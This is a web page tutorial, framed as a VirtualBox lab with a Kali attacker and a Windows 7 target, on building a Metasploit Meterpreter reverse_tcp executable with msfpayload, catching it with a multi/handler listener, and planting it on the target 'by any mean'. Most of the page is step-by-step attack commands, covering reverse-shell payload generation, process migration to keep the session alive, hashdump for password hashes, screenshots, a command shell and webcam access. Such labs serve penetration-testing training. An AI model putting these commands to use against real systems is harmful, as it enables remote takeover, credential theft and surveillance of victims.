top of page

Metasploit Meterpreter

Meterpreter is a custom payload of metasploit and is leveraged as a payload after vulnerability is exploited. Meterpreter is an extension of the Metasploit Framework that allows us to extend Metasploit’s functionality and further compromise the target.


Some of it's functionality includes ways to cover your tracks, reside purely in memory, dump hashes, access operating systems, pivot, and much more. Let’s again try to get the access of Windows system as done in previous exercise by making an executable (exe) file in metasploit but using a meterpreter payload as follows. You can use this payload with regular bind tcp connection too.


Deliverable:

Lab Set up

  • Virtualization using Oracle Virtual box

  • Attacker’s System: Kali Linux

  • Target System : Windows 7

In Kali Linux --> Terminal

1. To create an executable (exe) file.

~# msfpayload windows/meterpreter/reverse_tcp LHOST = [IP address of Attacker System] LPORT = 1337 X > /root/Desktop/[newfilename.exe] (Enter)

Here, LHOST --> Local Host i.e. Attacker System

LPORT --> Local Port for listening

X --> to stop or terminate command

/root/Desktop --> path or directory to store new exe file

It will create an executable (exe) file on desktop in Kali Linux.

2. Start msfconsole

~# msfconsole (Enter)

3. Create a handler to handle the connection from target.

> use exploit/multi/handler (Enter)

4. Set the same payload that is set while making the executable (exe) file.

> set payload windows/meterpreter/reverse_tcp (Enter)

> show options (Enter)

5. Set Local host IP address.

> set LHOST [IP address of Attacker System] (Enter)

6. Set Local listening port that was set while making the executable (exe) file.

> set LPORT 1337 (enter)

7. Now exploit

> exploit (Enter)

8. Meanwhile try to plant this exe file into target Windows 7 system by any mean.



9. When somebody clicks on that exe (planted in windows 7 system), a reverse tcp connection from target Windows 7 system to Attacker Kali Linux system will be made. And you will get a meterpreter shell. Now you can run some commands those can’t be possible with the payloads other than meterpreter.


10. For example, a current screenshot of target system can be taken.

> screenshot (Enter)

11. For example, information about target can be found out.

> sysinfo (Enter)

12. For example, running processes can be listed and you can kill or migrate to any process.

> ps (Enter)

Or

> kill [PID of the process to be killed]

Or

> migrate [PID of the process used for migration] (Enter)

Here, one should note that, Meterpreter allows the user to migrate the session to other process. And at this time attacker should migrate to the process that has ‘system’ authority and usually which is not killed by the target system user like ‘explorer.exe’ process. If this is performed, there are often no chances to lose the meterpreter shell connection with target system.


13. For example, target system’s password hash can be found out.

> hashdump (Enter)

14. For example, getting command prompt of the target Windows system.

> shell (Enter)

15. There are many more commands can be used in meterpreter shell like upload, download, edit and execute a file or use the web cam of target system.


bottom of page